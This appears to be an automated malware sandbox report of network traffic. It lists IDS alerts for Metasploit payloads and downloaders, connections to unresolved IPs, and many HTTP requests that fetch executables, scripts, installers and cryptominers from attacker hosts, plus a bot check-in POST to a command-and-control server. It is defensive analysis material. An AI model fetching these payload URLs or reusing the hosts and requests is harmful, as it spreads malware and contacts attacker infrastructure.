                            Source: Network trafficSuricata IDS: 2025644 - Severity 1 - ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server) : 185.199.110.133:443 -> 192.168.2.6:49841
                            Source: Network trafficSuricata IDS: 2820245 - Severity 1 - ETPRO MALWARE Possible Metasploit Payload Common Construct Bind_API (from server) : 185.199.110.133:443 -> 192.168.2.6:49841
                            Source: Network trafficSuricata IDS: 2820208 - Severity 1 - ETPRO MALWARE Possible Metasploit Payload (AB Template PDB) : 185.199.110.133:443 -> 192.168.2.6:49841
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49760 -> 179.43.141.89:443
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:51907 -> 45.131.244.47:443
                            Source: Network trafficSuricata IDS: 2820208 - Severity 1 - ETPRO MALWARE Possible Metasploit Payload (AB Template PDB) : 140.238.122.17:443 -> 192.168.2.6:49825
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:51664 -> 45.131.244.47:443
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:51768 -> 45.131.244.47:443
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Outsoar.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Kanarierens.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Underbalancernes.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/GndmVCh239.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/WXcDboC135.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/JNIMFtZ127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /bot/ HTTP/1.0User-Agent: Mozilla/4.0Host: 18.230.108.113Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 26Data Raw: 39 67 73 41 41 41 43 56 6d 35 4c 4c 6b 5a 4f 43 6b 59 53 58 6c 41 3d 3d 0d 0a Data Ascii: 9gsAAACVm5LLkZOCkYSXlA==
                            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.207.229
                            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.207.229
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 159.65.122.137
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.75
                            Source: unknownTCP traffic detected without corresponding DNS query: 121.127.231.160
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.230.108.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.230.108.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.230.108.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.207.229
                            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.207.229
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.230.108.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.230.108.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.10
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.252.155.72
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.240
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.240
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.40
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.234
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.34
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.180.108.247
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.39
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0300105C GetProcessHeap,lstrlen,socket,socket,gethostbyname,gethostbyname,htons,connect,connect,lstrlen,send,send,RtlAllocateHeap,RtlAllocateHeap,RtlReAllocateHeap,RtlReAllocateHeap,recv,recv,closesocket,closesocket,RtlFreeHeap,RtlFreeHeap,16_2_0300105C
                            Source: global trafficHTTP traffic detected: GET /downloads/text_online/ HTTP/1.1Host: urlhaus.abuse.chUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /neari44/fash/main/22.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /monkeyrizz/ApiUpdater/refs/heads/main/ApiUpdater.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Splash2520/splash/refs/heads/main/Network.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Abjay231/knack/main/e.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Game-6d/565/main/99999.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /ashrx/new/main/rea.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /oraples/klick/master/windows.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /mpy66/nix/refs/heads/main/discordupdate.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /blackhatethicalhacking/fud/refs/heads/master/access.exe HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /abc.exe HTTP/1.1Host: 179.43.141.89Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /payload.exe HTTP/1.1Host: 140.238.122.17Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Client-built.exe HTTP/1.1Host: wavedownload.netlify.appAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /imperiska/lekers/raw/refs/heads/main/noyjhoadw.exe HTTP/1.1Host: github.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /raw/djZsmRNC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Outsoar.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /raw/7G6zzQwJ HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Kanarierens.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/Underbalancernes.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/GndmVCh239.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/WXcDboC135.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /lmjM1ItiFCHjYA4JNRBYB34/JNIMFtZ127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: filedn.euCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /Lovform.vbs HTTP/1.1Host: 191.96.207.229Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Rodham.vbs HTTP/1.1Host: 191.96.207.229Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/6963001093/jrgXmS0.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/7098980627/ugdKEDU.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/darkfarter/random.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/t0rnAd0t/random.exe HTTP/1.1Host: 185.215.113.40Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /e.exe HTTP/1.1Host: 45.141.26.234Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/6144532443/LCESjzR.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/nickjonsong/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/5666444957/tYrnx75.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/7193289845/IJWSn6z.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/t0rnAd0t/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/darkfarter/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/6963001093/jrgXmS0.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/7098980627/ugdKEDU.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 185.215.113.39Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /docs/xmrig.exe HTTP/1.1Host: 159.65.122.137:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /lolMiner.exe HTTP/1.1Host: 185.215.113.51Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Host: 185.215.113.51Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /WatchDog.exe HTTP/1.1Host: 185.215.113.51Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Loader.exe HTTP/1.1Host: 167.114.85.75Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /abc/15.exe HTTP/1.1Host: 121.127.231.160Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/traf.exe HTTP/1.1Host: 18.230.108.113Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/sel1.exe HTTP/1.1Host: 18.230.108.113Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/vapo.exe HTTP/1.1Host: 18.230.108.113Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /files/amada2.exe HTTP/1.1Host: 18.230.108.113Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /vapo.exe HTTP/1.1Host: 18.230.108.113Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /fake/ABC.exe HTTP/1.1Host: 185.177.239.10Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: 5.252.155.72Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Update.exe HTTP/1.1Host: 185.208.159.240:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /test.exe HTTP/1.1Host: 185.208.159.240:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /home/rh_0-8_2025-01-23_15-05.exe HTTP/1.1Host: 185.196.8.34Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /glow/setup.msi HTTP/1.1Host: 185.180.108.247:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /box/setupa.msi HTTP/1.1Host: 5.181.3.225:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /box/setupb.msi HTTP/1.1Host: 5.181.3.225:8080Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /upload/T.exe HTTP/1.1Host: 45.138.183.226Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Enalib.exe HTTP/1.1Host: 216.9.224.66:5000Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /abc/36.exe HTTP/1.1Host: 121.127.231.166Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /AV.scr HTTP/1.1Host: 123.114.81.161:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /AV.scr HTTP/1.1Host: 123.112.97.90:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Photo.scr HTTP/1.1Host: 123.112.97.90:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Photo.scr HTTP/1.1Host: 123.114.81.161:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Video.scr HTTP/1.1Host: 123.114.81.161:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Video.scr HTTP/1.1Host: 123.112.97.90:8085Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Video.scr HTTP/1.1Host: 111.176.23.239:8081Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Photo.scr HTTP/1.1Host: 154.16.66.225Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Photo.scr HTTP/1.1Host: 111.176.20.173:8081Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /AV.scr HTTP/1.1Host: 111.176.23.239:8081Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Photo.scr HTTP/1.1Host: 111.176.23.239:8081Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /AV.scr HTTP/1.1Host: 154.16.66.225Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Video.scr HTTP/1.1Host: 111.176.20.173:8081Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Video.scr HTTP/1.1Host: 154.16.66.225Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 124.221.100.215Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 120.26.164.174:8088Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 45.192.96.63:6001Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 83.229.122.83:801Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 82.156.0.140:9900Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 159.75.114.131:5465Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 120.26.164.174:8099Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 124.71.164.7:5001Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 124.71.164.7:4433Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /02.08.2022.exe HTTP/1.1Host: 20.124.90.24Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Fuldautomatiseres.vbs HTTP/1.1Host: 191.96.207.229Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /infopage/tqvaxy.exe HTTP/1.1Host: 147.45.44.131Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /infopage/rtqagvxp.exe HTTP/1.1Host: 147.45.44.131Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /infopage/srqinsv.exe HTTP/1.1Host: 147.45.44.131Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /blackhatethicalhacking/fud/raw/refs/heads/master/access.exe HTTP/1.1Host: github.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Enalib.exe HTTP/1.1Host: plunder.dedyn.io:5000Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /mpy66/nix/raw/refs/heads/main/discordupdate.exe HTTP/1.1Host: github.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Sulfux29/CustomRPCC/releases/download/discord/MSystem32.exe HTTP/1.1Host: github.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Splash2520/splash/raw/refs/heads/main/Network.exe HTTP/1.1Host: github.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Enalib.exe HTTP/1.1Host: kio.giize.com:5000Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /Enalib.exe HTTP/1.1Host: mta0.kio.giize.com:5000Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.7.4.post0
                            Source: global trafficHTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                            Source: wow.exe, 00000009.00000003.2244345593.000001D428CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none'; equals www.twitter.com (Twitter)
